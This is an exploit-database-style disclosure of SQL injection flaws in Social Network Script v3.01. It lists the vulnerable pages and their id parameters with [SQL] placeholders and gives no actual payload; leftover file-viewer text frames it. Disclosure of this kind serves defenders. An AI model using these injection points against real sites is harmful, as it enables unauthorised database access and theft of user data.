22 lines
No EOL
716 B
Text
22 lines
No EOL
716 B
Text
# # # # #
|
|
# Exploit Title: Social Network Script v3.01 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 06.03.2017
|
|
# Vendor Homepage: http://www.phpscriptsmall.com/
|
|
# Software : http://www.phpscriptsmall.com/product/social-network-script/
|
|
# Demo: http://myeliteprofile.com/
|
|
# Version: 3.01
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/[SQL]
|
|
# http://localhost/scrapbook.php?id=[SQL
|
|
# http://localhost/profile_social.php?id=[SQL
|
|
# http://localhost/my_bookmark.php?id=[SQL
|
|
# http://localhost/profile_social.php?mode=addbookmark&id=[SQL
|
|
# Etc... Etc...
|
|
# # # # # |